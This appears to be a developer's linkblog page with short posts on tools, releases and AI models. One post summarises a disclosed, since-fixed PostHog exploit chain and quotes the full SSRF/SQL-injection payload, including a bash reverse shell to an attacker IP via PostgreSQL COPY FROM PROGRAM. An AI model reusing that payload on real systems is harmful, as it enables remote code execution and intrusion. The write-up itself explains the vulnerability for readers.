Blogmarks


shot-scraper 1.9. New release of my shot-scraper CLI tool for taking screenshots and scraping websites with JavaScript from the terminal.

The new shot-scraper har -x https://simonwillison.net/ command is really neat. The inspiration was the digital forensics expedition I went on to figure out why Rob Pike got spammed. You can now perform a version of that investigation like this:

cd /tmp

shot-scraper har --wait 10000 'https://theaidigest.org/village?day=265' -x

Then dig around in the resulting JSON files in the /tmp/theaidigest-org-village folder.

Copyright Release for Contributions To SQLite. D. Richard Hipp called me out for spreading misinformation on Hacker News that SQLite refuses outside contributions:

No, Simon, we don't "refuse". We are just very selective and there is a lot of paperwork involved to confirm the contribution is in the public domain and does not contaminate the SQLite core with licensed code.

I deeply regret this error! I'm linking to the copyright release document here - it looks like SQLite's public domain nature makes this kind of clause extremely important:

[...] To the best of my knowledge and belief, the changes and enhancements that I have contributed to SQLite are either originally written by me or are derived from prior works which I have verified are also in the public domain and are not subject to claims of copyright by other parties.

Out of curiosity I decided to see how many people have contributed to SQLite outside of the core team of Richard, Dan and Joe. I ran that query using Fossil, SQLite's own SQLite-based version control system, like this:

brew install fossil

fossil clone https://www.sqlite.org/src sqlite.fossil

fossil sql -R sqlite.fossil "

SELECT user, COUNT(*) as commits

FROM event WHERE type='ci'

GROUP BY user ORDER BY commits DESC

"

I got back 38 rows, though I think danielk1977 and dan may be duplicates.
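Since a Fossil repository file is itself a SQLite database, the same query can in principle be run from Python's sqlite3 module. Here's a minimal sketch under that assumption. The commits_by_user() helper and the alias mapping are hypothetical names for illustration, and the rows in the demo table are toy data, not real SQLite commit counts. Folding danielk1977 into dan reflects the guess above, not a confirmed fact.

```python
import sqlite3

# Same query as the fossil sql invocation above.
COMMITS_BY_USER = """
SELECT user, COUNT(*) AS commits
FROM event WHERE type = 'ci'
GROUP BY user ORDER BY commits DESC
"""


def commits_by_user(conn, aliases=None):
    """Run the query and fold alias usernames into one canonical name."""
    aliases = aliases or {}
    totals = {}
    for user, commits in conn.execute(COMMITS_BY_USER):
        canonical = aliases.get(user, user)
        totals[canonical] = totals.get(canonical, 0) + commits
    # Most commits first, ties broken alphabetically.
    return sorted(totals.items(), key=lambda item: (-item[1], item[0]))


# Toy stand-in for the repository's event table (made-up rows).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE event (type TEXT, user TEXT)")
conn.executemany(
    "INSERT INTO event VALUES (?, ?)",
    [("ci", "drh"), ("ci", "drh"), ("ci", "drh"),
     ("ci", "dan"), ("ci", "danielk1977"), ("w", "someone")],
)

# Assumption: danielk1977 and dan are the same person.
merged = commits_by_user(conn, aliases={"danielk1977": "dan"})
print(merged)
```

Against a real clone, passing sqlite3.connect("sqlite.fossil") instead of the in-memory database should work the same way.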

Update: The SQLite team have clarified this on their SQLite is Public Domain page. It used to read "In order to keep SQLite completely free and unencumbered by copyright, the project does not accept patches." - it now reads:

In order to keep SQLite completely free and unencumbered by copyright, the project does not accept patches from random people on the internet. There is a process to get a patch accepted, but that process is involved and for smaller changes is not normally worth the effort.

simonw/actions-latest.

Today in extremely niche projects, I got fed up of Claude Code creating GitHub Actions workflows for me that used stale actions: actions/setup-python@v4 when the latest is actions/setup-python@v6 for example.

I couldn't find a good single place listing those latest versions, so I had Claude Code for web (via my phone, I'm out on errands) build a Git scraper to publish those versions in one place:

https://simonw.github.io/actions-latest/versions.txt

Tell your coding agent of choice to fetch that any time it wants to write a new GitHub Actions workflow.

(I may well bake this into a Skill.)

Here's the first and second transcript I used to build this, shared using my claude-code-transcripts tool (which just gained a search feature.)

textarea.my on GitHub (via) Anton Medvedev built textarea.my, which he describes as:

A minimalist text editor that lives entirely in your browser and stores everything in the URL hash.

It's ~160 lines of HTML, CSS and JavaScript and it's worth reading the whole thing. I picked up a bunch of neat tricks from this!

- <article contenteditable="plaintext-only"> - I did not know about the plaintext-only value, supported across all the modern browsers.

- It uses new CompressionStream('deflate-raw') to compress the editor state so it can fit in a shorter fragment URL.

- It has a neat custom save option which triggers if you hit ((e.metaKey || e.ctrlKey) && e.key === 's') - on browsers that support it (mainly Chrome variants) this uses window.showSaveFilePicker(), other browsers get a straight download - in both cases generated using URL.createObjectURL(new Blob([html], {type: 'text/html'}))
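The CompressionStream('deflate-raw') trick has a close equivalent in Python's zlib module, which makes it easy to see why it shortens the URL. This is a sketch of the idea only: the encode_state() and decode_state() names are hypothetical, and the use of URL-safe base64 for the fragment is an assumption, not necessarily how textarea.my encodes its hash.

```python
import base64
import zlib


def encode_state(text: str) -> str:
    """Compress text with raw DEFLATE and make it safe for a URL fragment."""
    # wbits=-15 asks zlib for a raw deflate stream (no zlib header or checksum).
    compressor = zlib.compressobj(level=9, wbits=-15)
    raw = compressor.compress(text.encode("utf-8")) + compressor.flush()
    # Assumption: URL-safe base64 with the padding stripped.
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_state(fragment: str) -> str:
    """Reverse encode_state(): restore padding, decode, then inflate."""
    padded = fragment + "=" * (-len(fragment) % 4)
    raw = base64.urlsafe_b64decode(padded)
    return zlib.decompress(raw, wbits=-15).decode("utf-8")


text = "hello world " * 50
fragment = encode_state(text)
restored = decode_state(fragment)
print(len(text), "characters ->", len(fragment), "characters in the fragment")
```

Repetitive text shrinks dramatically. Short or random-looking text may not shrink at all, since base64 adds about a third on top of the compressed bytes.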

The debounce() function it uses deserves a special note:

function debounce(ms, fn) {
  let timer
  return (...args) => {
    clearTimeout(timer)
    timer = setTimeout(() => fn(...args), ms)
  }
}

That's really elegant. The goal of debounce(ms, fn) is to take a function and a timeout (e.g. 100ms) and ensure that the function runs at most once every 100ms.

This one works using a closure variable timer to capture the setTimeout timer ID. On subsequent calls that timer is cancelled and a new one is created - so if you call the function five times in quick succession it will execute just once, 100ms after the last of that sequence of calls.
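The same closure pattern translates to Python fairly directly, with threading.Timer standing in for setTimeout. This is a rough port for illustration, not part of textarea.my. The lock is an addition that JavaScript's single-threaded event loop doesn't need.

```python
import threading
import time
from typing import Any, Callable, Optional


def debounce(seconds: float, fn: Callable[..., Any]) -> Callable[..., None]:
    """Return a wrapper that runs fn once, `seconds` after the last call."""
    timer: Optional[threading.Timer] = None
    lock = threading.Lock()

    def debounced(*args: Any, **kwargs: Any) -> None:
        nonlocal timer
        with lock:
            # Cancel the pending call, if any, then schedule a fresh one.
            if timer is not None:
                timer.cancel()
            timer = threading.Timer(seconds, fn, args=args, kwargs=kwargs)
            timer.daemon = True
            timer.start()

    return debounced


calls = []
record = debounce(0.05, calls.append)
for i in range(5):
    record(i)  # five calls in quick succession
time.sleep(0.3)  # wait for the one surviving timer to fire
print(calls)
```

Only the arguments from the final call in the burst reach the wrapped function, which matches the JavaScript version's behavior.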

How uv got so fast.

Andrew Nesbitt provides an insightful teardown of why uv is so much faster than pip. It's not nearly as simple as just "they rewrote it in Rust" - uv gets to skip a huge amount of Python packaging history (which pip needs to implement for backwards compatibility) and benefits enormously from work over recent years that makes it possible to resolve dependencies across most packages without having to execute the code in setup.py using a Python interpreter.

Two notes that caught my eye that I hadn't understood before:

HTTP range requests for metadata. Wheel files are zip archives, and zip archives put their file listing at the end. uv tries PEP 658 metadata first, falls back to HTTP range requests for the zip central directory, then full wheel download, then building from source. Each step is slower and riskier. The design makes the fast path cover 99% of cases. None of this requires Rust.

[...]

Compact version representation. uv packs versions into u64 integers where possible, making comparison and hashing fast. Over 90% of versions fit in one u64. This is micro-optimization that compounds across millions of comparisons.

I wanted to learn more about these tricks, so I fired up an asynchronous research task and told it to check out the astral-sh/uv repo, find the Rust code for both of those features and try porting it to Python to help me understand how it works.

Here's the report that it wrote for me, the prompts I used and the Claude Code transcript.

You can try the script it wrote for extracting metadata from a wheel using HTTP range requests like this:

uv run --with httpx https://raw.githubusercontent.com/simonw/research/refs/heads/main/http-range-wheel-metadata/wheel_metadata.py https://files.pythonhosted.org/packages/8b/04/ef95b67e1ff59c080b2effd1a9a96984d6953f667c91dfe9d77c838fc956/playwright-1.57.0-py3-none-macosx_11_0_arm64.whl -v

The Playwright wheel there is ~40MB. Adding -v at the end causes the script to spit out verbose details of how it fetched the data - which looks like this.

Key extract from that output:

[1] HEAD request to get file size...

File size: 40,775,575 bytes

[2] Fetching last 16,384 bytes (EOCD + central directory)...

Received 16,384 bytes

[3] Parsed EOCD:

Central directory offset: 40,731,572

Central directory size: 43,981

Total entries: 453

[4] Fetching complete central directory...

...

[6] Found METADATA: playwright-1.57.0.dist-info/METADATA

Offset: 40,706,744

Compressed size: 1,286

Compression method: 8

[7] Fetching METADATA content (2,376 bytes)...

[8] Decompressed METADATA: 3,453 bytes

Total bytes fetched: 18,760 / 40,775,575 (100.0% savings)
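Steps [2] to [4] in that output hinge on the zip End of Central Directory (EOCD) record, a fixed 22-byte structure near the end of the file that says where the file listing starts and how big it is. Here's a minimal sketch of parsing it with the standard library. It works on an in-memory demo archive rather than real HTTP range requests, and the parse_eocd() and build_demo_wheel() names are hypothetical. It is not the code from the research report, and it ignores zip64 archives.

```python
import io
import struct
import zipfile

EOCD_SIGNATURE = b"PK\x05\x06"
# signature, disk numbers (2), entry counts (2), CD size, CD offset, comment length
EOCD_FORMAT = "<4sHHHHIIH"
EOCD_SIZE = struct.calcsize(EOCD_FORMAT)  # 22 bytes


def parse_eocd(tail: bytes) -> dict:
    """Find and decode the EOCD record in the last bytes of a zip file."""
    pos = tail.rfind(EOCD_SIGNATURE)
    if pos == -1:
        raise ValueError("no EOCD record found in the supplied bytes")
    fields = struct.unpack(EOCD_FORMAT, tail[pos:pos + EOCD_SIZE])
    _, _, _, _, total_entries, cd_size, cd_offset, _ = fields
    return {"total_entries": total_entries, "cd_size": cd_size, "cd_offset": cd_offset}


def build_demo_wheel() -> bytes:
    """Create a tiny wheel-shaped zip archive in memory (toy content)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("demo/__init__.py", "print('hi')\n")
        zf.writestr("demo-1.0.dist-info/METADATA", "Name: demo\nVersion: 1.0\n")
    return buffer.getvalue()


wheel_bytes = build_demo_wheel()
tail = wheel_bytes[-16384:]  # stands in for a range request for the final 16 KB
eocd = parse_eocd(tail)
# With a real wheel this slice would be a second range request if the
# central directory did not fit entirely inside the tail.
start = eocd["cd_offset"]
central_directory = wheel_bytes[start:start + eocd["cd_size"]]
print(eocd)
```

In the Playwright output above the central directory (43,981 bytes) is larger than the 16,384 byte tail, which is why there's a separate step [4] to fetch it in full.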

The section of the report on compact version representation is interesting too. Here's how it illustrates sorting version numbers correctly based on their custom u64 representation:

Sorted order (by integer comparison of packed u64):

1.0.0a1 (repr=0x0001000000200001)

1.0.0b1 (repr=0x0001000000300001)

1.0.0rc1 (repr=0x0001000000400001)

1.0.0 (repr=0x0001000000500000)

1.0.0.post1 (repr=0x0001000000700001)

1.0.1 (repr=0x0001000100500000)

2.0.0.dev1 (repr=0x0002000000100001)

2.0.0 (repr=0x0002000000500000)
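The hex values above suggest a layout that can be reconstructed by hand: 16 bits for the first release number, 8 bits each for the next two, a byte left at zero here (presumably for a fourth release segment), 8 bits for the suffix kind and 16 bits for the suffix number. The sketch below implements that reading. The layout is inferred from the output above and may not match uv's actual Rust representation, pack_version() is a hypothetical name, and the parser only handles the simple version shapes in this list.

```python
import re

# Suffix kinds, ordered so that dev < a < b < rc < (final) < post.
# Values are read off the hex output above, not taken from uv's source.
_KIND = {"dev": 0x10, "a": 0x20, "b": 0x30, "rc": 0x40, None: 0x50, "post": 0x70}

_PATTERN = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:(a|b|rc)(\d+)|\.(post|dev)(\d+))?$")


def pack_version(version: str) -> int:
    """Pack a simple X.Y.Z[suffix] version into one sortable 64-bit integer."""
    match = _PATTERN.match(version)
    if match is None:
        raise ValueError(f"unsupported version for this sketch: {version!r}")
    major, minor, patch = int(match[1]), int(match[2]), int(match[3])
    kind = match[4] or match[6]  # None when there is no suffix
    number = int(match[5] or match[7] or 0)
    if major > 0xFFFF or minor > 0xFF or patch > 0xFF or number > 0xFFFF:
        raise ValueError(f"{version!r} does not fit the compact layout")
    return (major << 48) | (minor << 40) | (patch << 32) | (_KIND[kind] << 16) | number


versions = ["2.0.0", "1.0.0", "1.0.0rc1", "2.0.0.dev1",
            "1.0.1", "1.0.0a1", "1.0.0.post1", "1.0.0b1"]
ordered = sorted(versions, key=pack_version)
for v in ordered:
    print(f"{v} (repr=0x{pack_version(v):016x})")
```

Because the release numbers sit in the high bits and the suffix kind sits below them, a plain integer comparison gives the right ordering, including pre-releases sorting before the final release.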

uv-init-demos.

uv has a useful uv init command for setting up new Python projects, but it comes with a bunch of different options like --app and --package and --lib and I wasn't sure how they differed.

So I created this GitHub repository which demonstrates all of those options, generated using this update-projects.sh script (thanks, Claude) which will run on a schedule via GitHub Actions to capture any changes made by future releases of uv.

MicroQuickJS. New project from programming legend Fabrice Bellard, of ffmpeg and QEMU and QuickJS and so much more fame:

MicroQuickJS (aka. MQuickJS) is a Javascript engine targetted at embedded systems. It compiles and runs Javascript programs with as low as 10 kB of RAM. The whole engine requires about 100 kB of ROM (ARM Thumb-2 code) including the C library. The speed is comparable to QuickJS.

It supports a subset of full JavaScript, though it looks like a rich and full-featured subset to me.

One of my ongoing interests is sandboxing: mechanisms for executing untrusted code - from end users or generated by LLMs - in an environment that restricts memory usage and applies a strict time limit and restricts file or network access. Could MicroQuickJS be useful in that context?

I fired up Claude Code for web (on my iPhone) and kicked off an asynchronous research project to explore that question:

My full prompt is here. It started like this:

Clone https://github.com/bellard/mquickjs to /tmp

Investigate this code as the basis for a safe sandboxing environment for running untrusted code such that it cannot exhaust memory or CPU or access files or the network

First try building python bindings for this using FFI - write a script that builds these by checking out the code to /tmp and building against that, to avoid copying the C code in this repo permanently. Write and execute tests with pytest to exercise it as a sandbox

Then build a "real" Python extension not using FFI and experiment with that

Then try compiling the C to WebAssembly and exercising it via both node.js and Deno, with a similar suite of tests [...]

I later added to the interactive session:

Does it have a regex engine that might allow a resource exhaustion attack from an expensive regex?

(The answer was no - the regex engine calls the interrupt handler even during pathological expression backtracking, meaning that any configured time limit should still hold.)

Here's the full transcript and the final report.

Some key observations:

- MicroQuickJS is very well suited to the sandbox problem. It has robust memory and time limits baked in, it doesn't expose any dangerous primitives like filesystem or network access and even has a regular expression engine that protects against exhaustion attacks (provided you configure a time limit).

- Claude spun up and tested a Python library that calls a MicroQuickJS shared library (involving a little bit of extra C), a compiled Python binding and a library that uses the original MicroQuickJS CLI tool. All of those approaches work well.

- Compiling to WebAssembly was a little harder. It got a version working in Node.js and Deno and Pyodide, but the Python libraries wasmer and wasmtime proved harder, apparently because "mquickjs uses setjmp/longjmp for error handling". It managed to get to a working wasmtime version with a gross hack.

I'm really excited about this. MicroQuickJS is tiny, full featured, looks robust and comes from excellent pedigree. I think this makes for a very solid new entrant in the quest for a robust sandbox.

Update: I had Claude Code build tools.simonwillison.net/microquickjs, an interactive web playground for trying out the WebAssembly build of MicroQuickJS, adapted from my previous QuickJS playground. My QuickJS page loads 2.28 MB (675 KB transferred). The MicroQuickJS one loads 303 KB (120 KB transferred).

Here are the prompts I used for that.

Sam Rose explains how LLMs work with a visual essay. Sam Rose is one of my favorite authors of explorable interactive explanations - here's his previous collection.

Sam joined ngrok in September as a developer educator. Here's his first big visual explainer for them, ostensibly about how prompt caching works but it quickly expands to cover tokenization, embeddings, and the basics of the transformer architecture.

The result is one of the clearest and most accessible introductions to LLM internals I've seen anywhere.

Introducing GPT-5.2-Codex. The latest in OpenAI's Codex family of models (not the same thing as their Codex CLI or Codex Cloud coding agent tools).

GPT‑5.2-Codex is a version of GPT‑5.2 further optimized for agentic coding in Codex, including improvements on long-horizon work through context compaction, stronger performance on large code changes like refactors and migrations, improved performance in Windows environments, and significantly stronger cybersecurity capabilities.

As with some previous Codex models this one is available via their Codex coding agents now and will be coming to the API "in the coming weeks". Unlike previous models there's a new invite-only preview process for vetted cybersecurity professionals for "more permissive models".

I've been very impressed recently with GPT 5.2's ability to tackle multi-hour agentic coding challenges. 5.2 Codex scores 64% on the Terminal-Bench 2.0 benchmark that GPT-5.2 scored 62.2% on. I'm not sure how concrete that 1.8% improvement will be!



I didn't hack API access together this time (see previous attempts), instead opting to just ask Codex CLI to "Generate an SVG of a pelican riding a bicycle" while running the new model (effort medium). Here's the transcript in my new Codex CLI timeline viewer, and here's the pelican it drew:

Agent Skills. Anthropic have turned their skills mechanism into an "open standard", which I guess means it lives in an independent agentskills/agentskills GitHub repository now? I wouldn't be surprised to see this end up in the AAIF, recently the new home of the MCP specification.

The specification itself lives at agentskills.io/specification, published from docs/specification.mdx in the repo.

It is a deliciously tiny specification - you can read the entire thing in just a few minutes. It's also quite heavily under-specified - for example, there's a metadata field described like this:

Clients can use this to store additional properties not defined by the Agent Skills spec

We recommend making your key names reasonably unique to avoid accidental conflicts

And an allowed-tools field:

Experimental. Support for this field may vary between agent implementations

Example:

allowed-tools: Bash(git:*) Bash(jq:*) Read

The Agent Skills homepage promotes adoption by OpenCode, Cursor, Amp, Letta, goose, GitHub, and VS Code. Notably absent is OpenAI, who are quietly tinkering with skills but don't appear to have formally announced their support just yet.

Update 20th December 2025: OpenAI have added Skills to the Codex documentation and the Codex logo is now featured on the Agent Skills homepage (as of this commit.)

swift-justhtml. First there was Emil Stenström's JustHTML in Python, then my justjshtml in JavaScript, then Anil Madhavapeddy's html5rw in OCaml, and now Kyle Howells has built a vibespiled dependency-free HTML5 parser for Swift using the same coding agent tricks against the html5lib-tests test suite.

Kyle ran some benchmarks to compare the different implementations:

- Rust (html5ever) total parse time: 303 ms

- Swift total parse time: 1313 ms

- JavaScript total parse time: 1035 ms

- Python total parse time: 4189 ms

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain (via) Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.

The way in abuses a webhooks system with non-robust URL validation, setting up an SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.

Here's the URL that gets injected:

http://clickhouse:8123/?query=SELECT+*+FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT+*+FROM+cmd_exec;+--\",'posthog','posthog')#

Reformatted a little for readability:

http://clickhouse:8123/?query=

SELECT *

FROM postgresql(

'db:5432',

'posthog',

"posthog_use')) TO STDOUT;

END;

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec (

cmd_output text

);

COPY cmd_exec

FROM PROGRAM $$

bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"

$$;

SELECT * FROM cmd_exec;

--",

'posthog',

'posthog'

)

#

This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in that ClickHouse function (since fixed). Then that query abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.

The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.
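The first link in the chain is a webhook URL that points at an internal hostname. One common defence is to resolve the hostname and refuse anything that lands on a private, loopback or otherwise non-public address. Here's a minimal sketch of that check using Python's ipaddress module. It is not PostHog's actual fix, the function names are hypothetical, and the fake resolver exists only so the example runs without touching DNS.

```python
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit


def is_internal_address(address: str) -> bool:
    """True for addresses a webhook should never be allowed to reach."""
    ip = ipaddress.ip_address(address)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_host(host: str) -> list[str]:
    """Default resolver: every address the hostname currently resolves to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_webhook_url(
    url: str, resolver: Callable[[str], Iterable[str]] = resolve_host
) -> bool:
    """Accept only http(s) URLs whose host resolves solely to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addresses = list(resolver(parts.hostname))
    except OSError:
        return False  # unresolvable hosts are rejected
    return bool(addresses) and not any(is_internal_address(a) for a in addresses)


# Fake DNS for the demo (hypothetical addresses).
fake_dns = {"clickhouse": ["172.18.0.5"], "example.com": ["93.184.216.34"]}


def fake_resolver(host: str) -> list[str]:
    return fake_dns.get(host, [])


internal_ok = is_safe_webhook_url("http://clickhouse:8123/?query=SELECT+1", fake_resolver)
external_ok = is_safe_webhook_url("https://example.com/hook", fake_resolver)
print(internal_ok, external_ok)
```

A check like this is only a starting point. The address needs to be re-validated at connection time and on every redirect, otherwise DNS rebinding or a redirect to an internal host can still get through.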

AoAH Day 15: Porting a complete HTML5 parser and browser test suite (via) Anil Madhavapeddy is running an Advent of Agentic Humps this year, building a new useful OCaml library every day for most of December.

Inspired by Emil Stenström's JustHTML and my own coding agent port of that to JavaScript, he coined the term vibespiling for AI-powered porting and transpiling of code from one language to another and had a go at building an HTML5 parser in OCaml, resulting in html5rw which passes the same html5lib-tests suite that Emil and I used for our projects.

Anil's thoughts on the copyright and ethical aspects of this are worth quoting in full:

The question of copyright and licensing is difficult. I definitely did some editing by hand, and a fair bit of prompting that resulted in targeted code edits, but the vast amount of architectural logic came from JustHTML. So I opted to make the LICENSE a joint one with Emil Stenström. I did not follow the transitive dependency through to the Rust one, which I probably should.

I'm also extremely uncertain about every releasing this library to the central opam repository, especially as there are excellent HTML5 parsers already available. I haven't checked if those pass the HTML5 test suite, because this is wandering into the agents vs humans territory that I ruled out in my groundrules. Whether or not this agentic code is better or not is a moot point if releasing it drives away the human maintainers who are the source of creativity in the code!

I decided to credit Emil in the same way for my own vibespiled project.

firefox parser/html/java/README.txt (via) TIL (or TIR - Today I was Reminded) that the HTML5 Parser used by Firefox is maintained as Java code (commit history here) and converted to C++ using a custom translation script.

You can see that in action by checking out the ~8GB Firefox repository and running:

cd parser/html/java

make sync

make translate

Here's a terminal session where I did that, including the output of git diff showing the updated C++ files.

I did some digging and found that the code that does the translation work lives, weirdly, in the Nu Html Checker repository on GitHub which powers the W3C's validator.w3.org/nu/ validation service!

Here's a snippet from htmlparser/cpptranslate/CppVisitor.java showing how a class declaration is converted into C++:

protected void startClassDeclaration() {
    printer.print("#define ");
    printer.print(className);
    printer.printLn("_cpp__");
    printer.printLn();
    for (int i = 0; i < Main.H_LIST.length; i++) {
        String klazz = Main.H_LIST[i];
        if (!klazz.equals(javaClassName)) {
            printer.print("#include \"");
            printer.print(cppTypes.classPrefix());
            printer.print(klazz);
            printer.printLn(".h\"");
        }
    }
    printer.printLn();
    printer.print("#include \"");
    printer.print(className);
    printer.printLn(".h\"");
    printer.printLn();
}

Here's a fascinating blog post from John Resig explaining how validator author Henri Sivonen introduced the new parser into Firefox in 2009.

The new ChatGPT Images is here. OpenAI shipped an update to their ChatGPT Images feature - the feature that gained them 100 million new users in a week when they first launched it back in March, but has since been eclipsed by Google's Nano Banana and then further by Nano Banana Pro in November.

The focus for the new ChatGPT Images is speed and instruction following:

It makes precise edits while keeping details intact, and generates images up to 4x faster

It's also a little cheaper: OpenAI say that the new gpt-image-1.5 API model makes image input and output "20% cheaper in GPT Image 1.5 as compared to GPT Image 1".

I tried a new test prompt against a photo I took of Natalie's ceramic stand at the farmers market a few weeks ago:

Add two kakapos inspecting the pots

Here's the result from the new ChatGPT Images model:

And here's what I got from Nano Banana Pro:

The ChatGPT Kākāpō are a little chonkier, which I think counts as a win.

I was a little less impressed by the result I got for an infographic from the prompt "Infographic explaining how the Datasette open source project works" followed by "Run some extensive searches and gather a bunch of relevant information and then try again" (transcript):

See my Nano Banana Pro post for comparison.

Both models are clearly now usable for text-heavy graphics though, which makes them far more useful than previous generations of this technology.

Update 21st December 2025: I realized I already have a tool for accessing this new model via the API. Here's what I got from the following:

OPENAI_API_KEY="$(llm keys get openai)" \
  uv run openai_image.py -m gpt-image-1.5 \
  'a raccoon with a double bass in a jazz bar rocking out'

Total cost: $0.2041.

s3-credentials 0.17. New release of my s3-credentials CLI tool for managing credentials needed to access just one S3 bucket. Here are the release notes in full:

That s3-credentials localserver command (documented here) is a little obscure, but I found myself wanting something like that to help me test out a new feature I'm building to help create temporary Litestream credentials using Amazon STS.

Most of that new feature was built by Claude Code from the following starting prompt:

Add a feature s3-credentials localserver which starts a localhost weberver running (using the Python standard library stuff) on port 8094 by default but -p/--port can set a different port and otherwise takes an option that names a bucket and then takes the same options for read--write/read-only etc as other commands. It also takes a required --refresh-interval option which can be set as 5m or 10h or 30s. All this thing does is reply on / to a GET request with the IAM expiring credentials that allow access to that bucket with that policy for that specified amount of time. It caches internally the credentials it generates and will return the exact same data up until they expire (it also tracks expected expiry time) after which it will generate new credentials (avoiding dog pile effects if multiple requests ask at the same time) and return and cache those instead.
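The caching behavior described in that prompt (return the same credentials until they expire, and generate replacements only once even if several requests arrive together) can be sketched with a lock around a cached value. This is an illustration of the pattern, not the code Claude Code wrote for s3-credentials. The CachedCredentials class, the injected clock and the fake generator are all hypothetical.

```python
import threading
import time
from typing import Callable, Optional


class CachedCredentials:
    """Cache generated credentials until they expire, refreshing under a lock."""

    def __init__(
        self,
        generate: Callable[[], dict],
        ttl_seconds: float,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._generate = generate
        self._ttl = ttl_seconds
        self._clock = clock
        self._lock = threading.Lock()
        self._value: Optional[dict] = None
        self._expires_at = 0.0

    def get(self) -> dict:
        # Holding the lock while generating means concurrent callers wait
        # for one refresh instead of each triggering their own (no dog pile).
        with self._lock:
            now = self._clock()
            if self._value is None or now >= self._expires_at:
                self._value = self._generate()
                self._expires_at = now + self._ttl
            return self._value


# Demo with a fake clock and a fake generator (no AWS calls are made).
fake_now = [0.0]
issued = []


def fake_generate() -> dict:
    issued.append(len(issued) + 1)
    return {"AccessKeyId": f"EXAMPLE{len(issued)}"}


cache = CachedCredentials(fake_generate, ttl_seconds=300, clock=lambda: fake_now[0])
first = cache.get()
second = cache.get()   # still fresh: same cached object
fake_now[0] = 301.0    # jump past the refresh interval
third = cache.get()    # expired: a new set is generated
print(first, second, third)
```

Injecting the clock keeps the expiry logic testable without sleeping. A real server would call something like STS inside generate() and would likely refresh a little before the true expiry time.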

ty: An extremely fast Python type checker and LSP (via) The team at Astral have been working on this for quite a long time, and are finally releasing the first beta. They have some big performance claims:

Without caching, ty is consistently between 10x and 60x faster than mypy and Pyright. When run in an editor, the gap is even more dramatic. As an example, after editing a load-bearing file in the PyTorch repository, ty recomputes diagnostics in 4.7ms: 80x faster than Pyright (386ms) and 500x faster than Pyrefly (2.38 seconds). ty is very fast!

The easiest way to try it out is via uvx:

cd my-python-project/

uvx ty check

I tried it against sqlite-utils and it turns out I have quite a lot of work to do!

Astral also released a new VS Code extension adding ty-powered language server features like go to definition. I'm still getting my head around how this works and what it can do.

Poe the Poet.

I was looking for a way to specify additional commands in my pyproject.toml file to execute using uv. There's an enormous issue thread on this in the uv issue tracker (300+ comments dating back to August 2024) and from there I learned of several options including this one, Poe the Poet.

It's neat. I added it to my s3-credentials project just now and the following now works for running the live preview server for the documentation:

uv run poe livehtml

Here's the snippet of TOML I added to my pyproject.toml:

[dependency-groups]
test = [
    "pytest",
    "pytest-mock",
    "cogapp",
    "moto>=5.0.4",
]
docs = [
    "furo",
    "sphinx-autobuild",
    "myst-parser",
    "cogapp",
]
dev = [
    {include-group = "test"},
    {include-group = "docs"},
    "poethepoet>=0.38.0",
]

[tool.poe.tasks]
docs = "sphinx-build -M html docs docs/_build"
livehtml = "sphinx-autobuild -b html docs docs/_build"
cog = "cog -r docs/*.md"

Since poethepoet is in the dev= dependency group any time I run uv run ... it will be available in the environment.

2025 Word of the Year: Slop. Slop lost to "brain rot" for Oxford Word of the Year 2024 but it's finally made it this year thanks to Merriam-Webster!

Merriam-Webster’s human editors have chosen slop as the 2025 Word of the Year. We define slop as “digital content of low quality that is produced usually in quantity by means of artificial intelligence.”

Copywriters reveal how AI has decimated their industry. Brian Merchant has been collecting personal stories for his series AI Killed My Job - previously covering tech workers, translators, and artists - and this latest piece includes anecdotes from 12 professional copywriters all of whom have had their careers devastated by the rise of AI-generated copywriting tools.

It's a tough read. Freelance copywriting does not look like a great place to be right now.

AI is really dehumanizing, and I am still working through issues of self-worth as a result of this experience. When you go from knowing you are valuable and valued, with all the hope in the world of a full career and the ability to provide other people with jobs... To being relegated to someone who edits AI drafts of copy at a steep discount because “most of the work is already done” ...

The big question for me is if a new AI-infested economy creates new jobs that are a great fit for people affected by this. I would hope that clear written communication skills are made even more valuable, but the people interviewed here don't appear to be finding that to be the case.

LLM 0.28. I released a new version of my LLM Python library and CLI tool for interacting with Large Language Models. Highlights from the release notes:

- New OpenAI models: gpt-5.1, gpt-5.1-chat-latest, gpt-5.2 and gpt-5.2-chat-latest. #1300, #1317

- When fetching URLs as fragments using llm -f URL, the request now includes a custom user-agent header: llm/VERSION (https://llm.datasette.io/). #1309

- Fixed a bug where fragments were not correctly registered with their source when using llm chat. Thanks, Giuseppe Rota. #1316

- Fixed some file descriptor leak warnings. Thanks, Eric Bloch. #1313

- Type annotations for the OpenAI Chat, AsyncChat and Completion execute() methods. Thanks, Arjan Mossel. #1315

- The project now uses uv and dependency groups for development. See the updated contributing documentation. #1318

That last bullet point about uv relates to the dependency groups pattern I wrote about in a recent TIL. I'm currently working through applying it to my other projects - the net result is that running the test suite is as simple as doing:

git clone https://github.com/simonw/llm

cd llm
